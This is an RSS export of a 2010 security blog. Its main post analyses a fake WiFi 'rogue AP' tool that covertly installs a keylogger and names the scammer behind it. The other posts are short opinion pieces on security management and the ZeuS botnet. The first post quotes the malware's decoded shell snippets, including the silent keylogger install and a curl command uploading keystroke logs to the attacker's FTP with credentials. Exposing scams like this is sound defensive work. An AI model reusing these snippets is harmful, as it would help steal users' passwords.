<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>I Am Security &#187; eCrime</title>
	<atom:link href="http://www.iamit.org/blog/tag/ecrime/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.iamit.org/blog</link>
	<description>Security news and research</description>
	<lastBuildDate>Mon, 26 Jul 2010 09:20:36 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
<cloud domain='www.iamit.org' port='80' path='/blog/?rsscloud=notify' registerProcedure='' protocol='http-post' />
		<item>
		<title>How [not to] scam security people</title>
		<link>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</link>
		<comments>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/#comments</comments>
		<pubDate>Thu, 08 Jul 2010 06:48:52 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Security Research]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[Attack Vector]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[technical]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/</guid>
		<description><![CDATA[An analysis of a rogue security tool that tries to steal passwords and scam people out of their paypal money and accounts.


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/04/credit-cards-on-a-clearance-sale-and-your-internet-security/' rel='bookmark' title='Permanent Link: Credit cards on a clearance sale and your internet security'>Credit cards on a clearance sale and your internet security</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/' rel='bookmark' title='Permanent Link: Tying up loose ends before Vegas (scammer closure)'>Tying up loose ends before Vegas (scammer closure)</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>I have been playing around with some wireless security for one of my customers lately. Having a pretty solid understanding of how things work, but also having been challenged to try out “everything there is to try” by the client, I went off to look for new tools that I might not have tried before.</p>
<p>It did not take too long, and with the accidental help of <a href="http://techcrunch.com/2010/07/05/employees-challenged-to-crack-facebook-security-succeed/">TechCrunch</a> (btw TechCrunch &#8211; you may want to change this link to something else after you read this&#8230;) I ran into <a href="http://fadzilmahfodh.blogspot.com/2009/07/8-wpa-hack-without-using-dictionary.html">this</a> “Wifi Security” site.</p>
<p>Yes, I know, the design is horrible, the scrolling thing on the top of the page is just missing a &lt;blink&gt; tag to drive you into an epileptic seizure, and the music, well, it’s music as part of a website &#8211; welcome to the 80’s.</p>
<p><img class="alignright size-full wp-image-485" title="used-by-fbi" src="http://www.iamit.org/blog/wp-content/uploads/2010/07/used-by-fbi.png" alt="" width="188" height="176" />Not being deterred by the horrible design, I went ahead and downloaded the “tools” offered in the article. After all, the FBI are using this guy’s tools&#8230;<br />
A quick look, and I was faced with three supposed shell scripts (ended with a .sh), and a tarball called “rogue.tar.gz”.<br />
When you get a shellscript that isn’t a shellscript, and is being reported as an “ELF” executable, you should get your detective hat on, which is exactly what I did.<br />
It didn’t take long, and the scam unfolded pretty quickly. Here’s a quick recap of what’s going on with this guy’s website:</p>
<ol style="list-style-type: decimal;">
<li>The provided “tools” aren’t even security tools. Initially I figured &#8211; ok, so this guy packed a few open source wireless tools and scripted them for easy usage. No. Not even <a href="http://theta44.org/karma/index.html">karma</a> which the main script suggests that is being used (appropriately I might add for the purpose of what this script is SUPPOSED to do).</li>
<li>A quick look at the tarball revealed that is actually contains a keylogger that has been graciously stolen from <a href="http://code.google.com/p/logkeys/">here</a>.</li>
<li>When the main script (karma.sh) is run, two supporting scripts (bg1.sh and bg2.sh) are launched. They are taking care of compiling the keylogger, running it, and pushing the logged keys logfile to an FTP for the attacker (I guess we can call him that now) to use at his convenience.</li>
<li>You are prompted to log into your webmail account, send a request for a free activation code with an indemnity text, which would be answered by the “automatic” processes on their end promptly so you can enter the code into the installer and start playing around with WiFi security. FTW!</li>
</ol>
<p>Observant readers may notice that I referred to the tool as having “supposed” script files, that are actually binaries, and now I refer back to them as scripts. What gives?<br />
Well, simply put, our attacker didn’t really take the time to code an application, he just wrote a couple of shell scripts, and in order to try to hide his malicious and ill-intent actions he “compiled” them with a utility that packs shellscripts in executable form called <a href="http://www.unixref.com/manPages/shc.html">shc</a>. The road from a linux executable to realizing what the script originally was is pretty short&#8230;</p>
<p>Now, that most of the cards are on the table, we can actually take a look at what scam this guy is running, and how he runs this. Following are some snippets from the shellscript that was presumably a wireless security tool. Even if you are not an avid Linux shellscripter, I’m sure that the annotations (true to the original) will shed some light&#8230;</p>
<blockquote><p># START BACKGROUND PROGRAMS BG1(RUN LINUX KEYLOGGER) AND BG2(RUN MONITORING KEYSTROKES AND SEND LOG.TXT FILES TO DRIVEHQ)<br />
cd lkl2<br />
./configure &#8211;silent<br />
make &#8211;silent<br />
make install &#8211;silent<br />
cd<br />
chmod +x /root/bg1.sh<br />
nohup /root/bg1.sh &amp;<br />
rm -r /root/nohup.out<br />
chmod +x /root/bg2.sh<br />
nohup /root/bg2.sh &amp;<br />
sleep 2<br />
rm -r /root/nohup.out<br />
clear</p></blockquote>
<p>So, we see how the keylogger is compiled, installed and the supporting scripts bg1 and bg2 are run.<br />
Next up, is the installer itself (if one can call that) which prompts for the user to send a FREE activation request to the attacker:</p>
<blockquote><p># MENU LIST<br />
echo “”<br />
echo “&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; “<br />
echo “THIS MESSAGES WILL NOT APPEAR AFTER karma.sh IS ACTIVATED “<br />
echo “&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212; “<br />
echo “”<br />
echo “1. Compose indemnity text below and send to <a href="mailto:fadzilmahfodh@gmail.com">fadzilmahfodh@gmail.com</a>”<br />
echo “   Yes, I want activation code and will never use for illegal purpose”<br />
echo “”<br />
echo “2. Check your email for activation code after sending text “<br />
echo “”<br />
read -p “3. Send now ? (0=no, 1=yes) “ act<br />
clear</p></blockquote>
<p>Obviously, the message WILL appear, as this thing is NEVER going to be activated &#8211; remember &#8211; this is a shellscript, and the “menu” appears as-is unconditionally so you can try to activate this until blue in the face&#8230; but we are getting ahead of ourselves.</p>
<p>I mentioned in the title that the scam is targeting security people. Besides the obvious wireless security related topic, here’s another little piece of “evidence” from the script:</p>
<blockquote><p>read -p  &#8220;Which backtrack are you using ? (bt3=3,bt4=4) &#8221; bt</p></blockquote>
<p>Our little friend is assuming that we are using BackTrack (as most security folks do) to run their wireless tests&#8230; the script continues according to which version of BT is entered (to accommodate the differences in network configuration&#8230;).<br />
I’ll skip through the network connectivity checks (trust me), and next up the attacker makes sure that firefox isn’t running, and:</p>
<blockquote><p>firefox https://login.yahoo.com/ &amp;<br />
sleep 4<br />
firefox https://www.google.com/accounts/ManageAccount &amp;<br />
sleep 4<br />
firefox http://home.live.com/</p></blockquote>
<p>The attacker obviously wants us to log into one of our webmail accounts so we can send him that activation request email with the indemnity text (how considerate). Keeping in mind that the keylogger is on and it’s activities are uploaded in the background to the attacker’s FTP &#8211; this is exactly where most people will fall into the trap.</p>
<p>And for the grand finale &#8211; the actual activation (you’d think huh?):</p>
<blockquote><p>############################<br />
# DECOY FOR ACTIVATION CODE<br />
clear<br />
echo &#8220;&#8221;<br />
read -p &#8220;ENTER ROGUE AP ACTIVATION CODE : &#8221; pls<br />
sleep 3<br />
echo &#8220;You have entered an invalid code &#8221;<br />
echo &#8220;&#8221;<br />
exit<br />
############################</p></blockquote>
<p>You have to admit that commented code is the best! It’s actually saying “decoy”! How f*&amp;^ing awesome is that? You get to craft your email after logging into your Yahoo!/Gmail/Live account, and then go back to this completely useless activation part. I do like the fact that the author put a “sleep 3” before letting you know that you entered the wrong code. As if it was hard at work verifying it. Classic.</p>
<p>That’s about it for the technical analysis, but it wouldn’t be complete without the actual interaction with the attacker, wouldn’t it? Let’s see &#8211; so, we crafted a “request for free activation” email with the indemnity text in it, and guess what &#8211; we got a reply!</p>
<blockquote><p>Hi</p>
<p>1. We are preparing  the activation code for you.</p>
<p>2. To make worth our while, could you consider a small donation (suggest euro 11) to support the website via Paypal a/c <a href="mailto:fadzilmahfodh@yahoo.com">fadzilmahfodh@yahoo.com</a> ?</p>
<p>Cheers.</p>
<p>EMAIL VIA MY CELLPHONE FOR FAST RESPONSE<br />
<a href="http://fadzilmahfodh.blogspot.com">http://fadzilmahfodh.blogspot.com</a></p></blockquote>
<p>So not only there is no activation code to be “prepared” for me (what? I’m going to feed it to the “decoy” and it’ll magically work?), we are being prompted to donate some cash for the poor bastard who worked so hard to make this tool for the community&#8230;<br />
I cordially answered that:</p>
<p>1. Thanks. I’ll be looking forward for the activation code.</p>
<p>2. I&#8217;ll probably consider it after being able to test out the tool.</p>
<p>Which was replied with a suggestion to try the trial version on his site (which relates to a completely different tool, but let’s not be too picky about it&#8230;).<br />
Now, thankfully, I was using one of my throw-away yahoo accounts, and apparently so our attacker. If you haven’t noticed, one of the cool things in the new Yahoo! webmail is that you get an indication whether the person emailing you is online or not, and you can chat with them!<br />
Guess what happens next&#8230;</p>
<blockquote><p>&#8212;&#8211; Our chat on Wed, 7/7/10 2:53 PM &#8212;&#8211;<br />
Iftach(2:34 PM):  hey man<br />
Iftach(2:34 PM):  mind if a ask a couple of questions?<br />
fadzilmahfodh(2:34 PM):  okey<br />
Iftach(2:35 PM):  cool. I&#8217;m doing this research on security tools and their<br />
authors&#8230;<br />
fadzilmahfodh(2:35 PM):  okey<br />
Iftach(2:35 PM):  saw your tool and wanted to hear about how you got to write<br />
it, how well is it distributed in the community etc&#8230;<br />
Iftach(2:36 PM):  does that activation thing a common practice with free tools?<br />
fadzilmahfodh(2:36 PM):  yes see, we need to maintain our website thus we need<br />
supporter<br />
fadzilmahfodh(2:37 PM):  everyday there are at least 500++ people asking for<br />
code<br />
Iftach(2:37 PM):  I see.<br />
fadzilmahfodh(2:37 PM):  i no longer able to provide for free<br />
fadzilmahfodh(2:37 PM):  too time consuming and i need to be compensated for my<br />
time and effort<br />
fadzilmahfodh(2:38 PM):  hope you understand</p></blockquote>
<p>Time and effort? Right&#8230; For a scam script that doesn’t even have any networking functionality&#8230; Ok, I’ll go along&#8230;</p>
<blockquote><p>Iftach(2:40 PM):  now, about the tool &#8211; that&#8217;s a linux binary obviously (thought<br />
it was a shell script at the beginning). Did you base it on something existing<br />
or write yourself?<br />
fadzilmahfodh(2:41 PM):  i wrote it by my self then scramble the code<br />
Iftach(2:41 PM):  hence the activation i see&#8230;<br />
fadzilmahfodh(2:42 PM):  i can afford to give &#8216;free lunch&#8217; to everybody. Hope<br />
you understand<br />
Iftach(2:43 PM):  sure, i understand.<br />
fadzilmahfodh(2:43 PM):  So you interested in the software?<br />
Iftach(2:44 PM):  more from a research point of view &#8211; for an article I&#8217;m<br />
writing<br />
Iftach(2:44 PM):  so, the installer you use, I see that it contains some<br />
additional code that is being compiled on the client.<br />
fadzilmahfodh(2:45 PM):  Yes. The purpose is the code will be unique to user<br />
hardware<br />
Iftach(2:45 PM):  and I saw that there were some FTP connections made? Is that<br />
to verify that the client is a registered one?<br />
fadzilmahfodh(2:46 PM):  Well, that is another story&#8230;<br />
Iftach(2:46 PM):  I&#8217;m listening<br />
fadzilmahfodh(2:46 PM):  maybe some other time huh<br />
Iftach(2:47 PM):  OK. Last question &#8211; do you get a lot of account passwords<br />
through that keylogger that sends the data to your FTP?<br />
fadzilmahfodh(2:47 PM):  sorry, no comment unless i am in court</p></blockquote>
<p>At this point of my “interview” with him, I guess that my cover was going to get pretty real, hence this “article” that you are reading&#8230; You can’t make this stuff up so I figured I’ll blog it&#8230;</p>
<blockquote><p>Iftach(2:48 PM):  aha, and it&#8217;s part of the installer because? just to make sure<br />
people can send the activation email correctly?<br />
Iftach(2:48 PM):  Back to statistics, out of the average 500 ppl asking for<br />
activation &#8211; how many passwords do you manage to grab?<br />
fadzilmahfodh(2:49 PM):  well, the ftp is to confirm that software match with<br />
data in server<br />
fadzilmahfodh(2:49 PM):  if it does not match, it will fail to run<br />
fadzilmahfodh(2:49 PM):  or i can just change the data/activation code in the<br />
server<br />
fadzilmahfodh(2:49 PM):  then everything will not run<br />
Iftach(2:49 PM):  and how does that relate to the keylogging?<br />
fadzilmahfodh(2:50 PM):  well, that i another story&#8230;<br />
Iftach(2:51 PM):  I mean &#8211; the keylogger data is sent to that FTP. Is that part<br />
of the verification or is this a separate process?<br />
Iftach(2:51 PM):  So, on average, how many accounts you manage to get on that<br />
FTP server per day?<br />
fadzilmahfodh(2:51 PM):  well, you do not even support my website and how the<br />
hell am i going to tell you<br />
Iftach(2:52 PM):  Let&#8217;s just get it straight &#8211; I&#8217;m not going to &#8220;support&#8221; the<br />
site&#8230; I&#8217;m just doing some research on security tools.<br />
fadzilmahfodh(2:52 PM):  bye<br />
Iftach(2:53 PM):  You are free to tell, or not if you don&#8217;t want to. But I&#8217;m<br />
publishing the story as it is&#8230;<br />
Iftach(2:53 PM):  With your acknowledgment that you use a keylogger to steal your<br />
site visitor passwords. Unless you want to be quoted otherwise in the story&#8230;</p></blockquote>
<p>True to my chat with Fadzil (or whatever his name is), I’m telling it the way it is.</p>
<p>But wait, there’s more!!! more? how come? well, just to put some icing on this, I went back and decoded the script that was in charge of the FTP upload&#8230;</p>
<blockquote><p>curl -s -k &#8211;ftp-ssl -T /pentest/log.txt -u fadzilmahfodh:buaya ftp://ftp.drivehq.com/code$number.txt</p></blockquote>
<p>Just to see the final lameness come to life as I tested the account:</p>
<p><a href="http://www.iamit.org/blog/wp-content/uploads/2010/07/wpid-ftpfail-2010-07-8-09-48.png" rel="lightbox[483]"><img src="http://www.iamit.org/blog/wp-content/uploads/2010/07/wpid-ftpfail-2010-07-8-09-48.png" alt="wpid-ftpfail-2010-07-8-09-48.png" width="514" height="178" /></a></p>
<p>And you know what &#8211; it’s all our fault! If we as a community would have “donated” to this guy for all his hard work and effort that he’s been putting in creating tools that are used by the FBI (check out his site&#8230;), he would have had the money to keep his driveHQ account in order and could make a decent living out of ripping people off.</p>
<p>Seriously.</p>
<p>p.s. you can find me talking about this entertaining even on <a href="http://www.isdpodcast.com/episode-167-targeting-security-newbies-w-iftach-ian-amit/">the ISDPodcast</a> with my buddy Rick, I just had to vent off before putting this in writing, so hopefully this account is a bit more thorough and to your liking&#8230;</p>
<p><strong>Update 7/13/2010</strong>: I could not have wished for better response from the community on this post, but having the actual culprit respond here is priceless. As you can probably see, Fadzil has posted a comment, and to sum things up let me just state that I&#8217;m not that surprised by its content (I think it&#8217;s called &#8220;pulling a ligatt&#8221; these days&#8230;). On one hand he offhandedly dismisses that there was ever such an issue with a keylogger, on the other hand he promises a better version with (and I&#8217;m quoting): &#8220;rogue ap + fake login page + keylogger + ftp = to get WPA or WPA2 password&#8221;.</p>
<p>You don&#8217;t say?! I&#8217;m still waiting for the security practitioner that will explain to me why would anyone need a keylogger + ftp to use a rogue AP with fake login pages. I&#8217;m really hoping that this post helps the community learn more on criminals such as the one we are dealing with here. Don&#8217;t be tempted to &#8220;smooth-talk&#8221; that tries to look technical and hackerish while having nothing behind it. And if you have had any additional experiences with this guy feel free to add them to the comments or email me so I&#8217;ll update this story for everyone&#8217;s benefit.</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/04/credit-cards-on-a-clearance-sale-and-your-internet-security/' rel='bookmark' title='Permanent Link: Credit cards on a clearance sale and your internet security'>Credit cards on a clearance sale and your internet security</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/tying-up-loose-ends-before-vegas-scammer-closure/' rel='bookmark' title='Permanent Link: Tying up loose ends before Vegas (scammer closure)'>Tying up loose ends before Vegas (scammer closure)</a></li>
<li><a href='http://www.iamit.org/blog/2010/07/the-turkish-hack-and-another-case-for-il-cert/' rel='bookmark' title='Permanent Link: The Turkish hack and another case for IL-CERT'>The Turkish hack and another case for IL-CERT</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/07/how-not-to-scam-security-people/feed/</wfw:commentRss>
		<slash:comments>17</slash:comments>
		</item>
		<item>
		<title>Identity crisis</title>
		<link>http://www.iamit.org/blog/2010/06/identity-crisis/</link>
		<comments>http://www.iamit.org/blog/2010/06/identity-crisis/#comments</comments>
		<pubDate>Mon, 07 Jun 2010 11:11:40 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[identity]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[risk management]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[security policy]]></category>
		<category><![CDATA[technology]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/2010/06/identity-crisis/</guid>
		<description><![CDATA[Here’s a common question I get asked a lot: “What technology should I use to secure my server/network/[some technology]?” The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/07/practical-vs-regulatory-the-votes-are-in/' rel='bookmark' title='Permanent Link: Practical vs. Regulatory &#8211; the votes are in!'>Practical vs. Regulatory &#8211; the votes are in!</a></li>
<li><a href='http://www.iamit.org/blog/2008/12/who-owns-your-online-identity-facebook-squatters-on-the-rise/' rel='bookmark' title='Permanent Link: Who owns your online identity? Facebook squatters on the rise'>Who owns your online identity? Facebook squatters on the rise</a></li>
<li><a href='http://www.iamit.org/blog/2010/05/being-in-the-middle/' rel='bookmark' title='Permanent Link: Being in the middle (or: things we didn&#8217;t manage to learn in a decade)'>Being in the middle (or: things we didn&#8217;t manage to learn in a decade)</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>Here’s a common question I get asked a lot: “What technology should I use to secure my server/network/[some technology]?”</p>
<p><img class="alignright" src="http://www.iamit.org/blog/wp-content/uploads/2010/06/wpid-IdentityCrisis-2010-06-7-14-11.jpg" alt="wpid-IdentityCrisis-2010-06-7-14-11.jpg" width="167" height="133" />The question is usually presented by someone who’s in charge of “Security” in an organization. Now, I wouldn’t have had a problem with this if this was a technician, or a pen-tester of sorts, but I get really nervous when the CISO/CIO/Security manager is the one asking.</p>
<p>I think that this question is highly inappropriate for two reasons:</p>
<ol style="list-style-type: decimal;">
<li>You should not be looking for “technology”. Buying a product is not going to make you more secure or less secure.</li>
<li>You should not be trying to protect a technology. Your servers, networks, routers, PCs, etc&#8230; are not the focus of information security. The information is&#8230;</li>
</ol>
<p>Having been working with senior management &#8211; sometimes as an advisor/consultant, and sometimes as a “virtual CISO”, I know that this is not what we expect the CISO or security manager to ask. We expect business savvy, we expect an understanding of what the information assets are, what are the information critical paths, who owns the information and what is the impact of every asset on the business. We expect that the understanding of how each assets fits into the grand scheme of things would be clear to whoever is in charge of securing it, and we expect them to take into account what is the potential damage related to each of these assets (in terms of losing it, having it fall into the wrong hands, etc&#8230;).<br />
For me (or us when talking as management) this is the only way to approach security. Funny how things get a little unclear when all you thought you needed to know was which vendor/product fits where in your topology, huh?</p>
<p>What strikes me as most peculiar is the fact that a lot of these security “professionals” find themselves in a self proclaimed identity crisis, having to deal with business requirements and financial understanding of how the business operates. and the weirdest thing is that they often choose to get back to what then “know” best &#8211; the technology side of things. Definitely not the way to make a move&#8230;</p>
<p><img class="alignleft" src="http://www.iamit.org/blog/wp-content/uploads/2010/06/wpid-risk-blocks-2010-06-7-14-11.jpg" alt="wpid-risk-blocks-2010-06-7-14-11.jpg" width="161" height="160" />I’m really hoping that all this preaching of “know thyself before you know your enemy” would help somehow, because right now unfortunately the situation at hand only brings us more business (not that I’m complaining). But seriously now &#8211; technology is fine and cool, but having the aptitude to know where it fits, not on an architectural level, but from a business perspective is the key to what we do. Get back to the drawing board, erase the network topology and start drawing the business one!</p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2009/07/practical-vs-regulatory-the-votes-are-in/' rel='bookmark' title='Permanent Link: Practical vs. Regulatory &#8211; the votes are in!'>Practical vs. Regulatory &#8211; the votes are in!</a></li>
<li><a href='http://www.iamit.org/blog/2008/12/who-owns-your-online-identity-facebook-squatters-on-the-rise/' rel='bookmark' title='Permanent Link: Who owns your online identity? Facebook squatters on the rise'>Who owns your online identity? Facebook squatters on the rise</a></li>
<li><a href='http://www.iamit.org/blog/2010/05/being-in-the-middle/' rel='bookmark' title='Permanent Link: Being in the middle (or: things we didn&#8217;t manage to learn in a decade)'>Being in the middle (or: things we didn&#8217;t manage to learn in a decade)</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/06/identity-crisis/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Cyber[Crime&#124;War] &#8211; connecting the dots &#8211; BlackHat EU 2010</title>
		<link>http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/</link>
		<comments>http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/#comments</comments>
		<pubDate>Thu, 15 Apr 2010 14:11:55 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[blackhat]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwar]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[research]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=435</guid>
		<description><![CDATA[Hola from Barcelona! It&#8217;s been a very productive couple of days here. Quite a lineup for this version of the BlackHat briefings out here. I had the great fortune of speaking right after a fantastic opening by Jeff Moss (BlackHat founder and director) and Max Kelly (Facebook&#8217;s CSO) that just set me up perfectly &#8211; [...]


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/its-all-about-the-money/' rel='bookmark' title='Permanent Link: It&#8217;s all about the money'>It&#8217;s all about the money</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-436" title="bh-eu10-head" src="http://www.iamit.org/blog/wp-content/uploads/2010/04/bh-eu10-head.png" alt="" width="600" height="188" /></p>
<p>Hola from Barcelona!</p>
<p>It&#8217;s been a very productive couple of days here. Quite a lineup for this version of the BlackHat briefings out here. I had the great fortune of speaking right after a fantastic opening by Jeff Moss (BlackHat founder and director) and Max Kelly (Facebook&#8217;s CSO) that just set me up perfectly &#8211; both discussed elements of attribution, deniability when talking about proxied attacks through certain countries, and how money is the driving force for all Cybercrime.</p>
<p>The talk went fairly well, and the responses I got afterward was favorable all around (if you were too shy to put me on the spot or complain feel free to do so here or on my email&#8230; all feedback will be highly appreciated). For your viewing pleasure, I am including the most up-to-date slides that I used for the talk here: <a href="http://www.iamit.org/docs/CyberCrimeWar-BHEU2010.pdf">CyberCrimeWar-BHEU2010.pdf</a></p>


<p>Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/03/cyberfudfare-repost-from-fudsec-com/' rel='bookmark' title='Permanent Link: Cyber[FUD]Fare &#8211; repost from fudsec.com'>Cyber[FUD]Fare &#8211; repost from fudsec.com</a></li>
<li><a href='http://www.iamit.org/blog/2010/01/cybercrime-cyberwarfare-and-2010/' rel='bookmark' title='Permanent Link: CyberCrime, CyberWarfare, and 2010'>CyberCrime, CyberWarfare, and 2010</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/its-all-about-the-money/' rel='bookmark' title='Permanent Link: It&#8217;s all about the money'>It&#8217;s all about the money</a></li>
</ol></p>]]></content:encoded>
			<wfw:commentRss>http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>It&#8217;s all about the money</title>
		<link>http://www.iamit.org/blog/2010/03/its-all-about-the-money/</link>
		<comments>http://www.iamit.org/blog/2010/03/its-all-about-the-money/#comments</comments>
		<pubDate>Thu, 18 Mar 2010 10:00:47 +0000</pubDate>
		<dc:creator>iamit</dc:creator>
				<category><![CDATA[Opinion]]></category>
		<category><![CDATA[Security Research]]></category>
		<category><![CDATA[conference]]></category>
		<category><![CDATA[cybercrime]]></category>
		<category><![CDATA[cyberwarfare]]></category>
		<category><![CDATA[defcon]]></category>
		<category><![CDATA[eCrime]]></category>
		<category><![CDATA[research]]></category>
		<category><![CDATA[technology]]></category>

		<guid isPermaLink="false">http://www.iamit.org/blog/?p=417</guid>
		<description><![CDATA[Coverage of the latest developments in the ZeuS botnet software licensing, and fighting the botnet internet connectivity.


Related posts:<ol><li><a href='http://www.iamit.org/blog/2010/04/cybercrimewar-connecting-the-dots-blackhat-eu-2010/' rel='bookmark' title='Permanent Link: Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010'>Cyber[Crime|War] &#8211; connecting the dots &#8211; BlackHat EU 2010</a></li>
<li><a href='http://www.iamit.org/blog/2009/11/excaliburcon-summary-and-general-china-notes/' rel='bookmark' title='Permanent Link: ExcaliburCon summary and general China notes'>ExcaliburCon summary and general China notes</a></li>
<li><a href='http://www.iamit.org/blog/2010/03/new-post-on-fudsec-com-cyberfudfare/' rel='bookmark' title='Permanent Link: New post on fudsec.com &#8211; CyberFUDfare'>New post on fudsec.com &#8211; CyberFUDfare</a></li>
</ol>]]></description>
			<content:encoded><![CDATA[<p>In my recent coverage of CyberCrime and CyberWar, I have neglected my old &#8220;friends&#8221; at the criminal world and gave them a little less attention (at least on their consumer business). It&#8217;s time to take a look back and see what are they up to.</p>
<p>Well &#8211; it might seem as non-news for readers of this blog (or people who were in my presentations at <a href="http://www.blackhat.com/html/bh-europe-08/bh-eu-08-archives.html#Amit">BlackHat</a>, <a href="http://defcon.org/html/links/dc-archives/dc-17-archive.html#Amit">DefCon</a>, <a href="http://hackerhalted.com/Conference/Speakers/IftachIanAmit/tabid/114/Default.aspx">HackerHalted</a>, <a href="http://www.newcamelotcouncil.com/SpeakersEN.html">ExcaliburCon</a>, <a href="http://technet.microsoft.com/en-us/security/cc748656.aspx">BlueHat</a>, or in other venues), but a couple of interesting sound-bytes may catch your eye:</p>
<p><img class="  alignright" title="That's how $205M look like..." src="http://www.justice.gov/dea/photos/operations/205million_fig1.jpg" alt="" width="300" height="225" /></p>
<p>1. ZeuS (good ol&#8217;e friend, how I missed debugging thou) has implemented licensing schema. The schema enforces that the licensed software be only used on licensed machines. News? yes, kind&#8217;a. Remember Neosploit (another personal pet-peeves)? Then you must remember the licensing scheme there as well. Pretty close to what ZeuS just introduced. And they say that the world has stopped sharing. pffff. And you can quote me on that. As anyone who ever took more than a brief look at how these things operate, the only takeaway possible is simple: It&#8217;s all about the money (hence &#8211; license enforcement is key. Ask Microsoft <img src='http://www.iamit.org/blog/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' />  )</p>
<p>2. Staying with ZeuS, there has been quite a lot of effort in the past few months to take down one of the main autonomous systems providing upstream for some of the biggest C&amp;C&#8217;s hosting ZeuS. You can read more about it <a href="http://blogs.zdnet.com/security/?p=5761">here</a>, and <a href="http://www.theregister.co.uk/2010/03/11/zeus_botnets_resurrected/">here</a>. Notable effort indeed, as TORYAK-AS has been on the hit list for ZeuS tracking researchers for a long time. Only thing is &#8211; there&#8217;s money here again. Which means that even taking down the entire AS won&#8217;t really take down the botnet as it relies on bulletproof hosting which means that there will ALWAYS be alternate routes leading to it. That&#8217;s how things work. Just like trying to fight trafficking and drug trade. As long as there is demand, there will be supply. You dry out one supplier, the economy will just pop out another one. It&#8217;s all about the money.</p>
<p>So, I&#8217;ll finish up with a couple of reassuring words. We are not done yet. We like fighting the technical battle (I&#8217;ll admit that I had my fun doing so, and still have fun when called to duty), but the real battle won&#8217;t be won in that playing field. Remember Al (Capone) &#8211; it didn&#8217;t take the DEA or FBI to take him down. It was the IRS&#8230;</p>


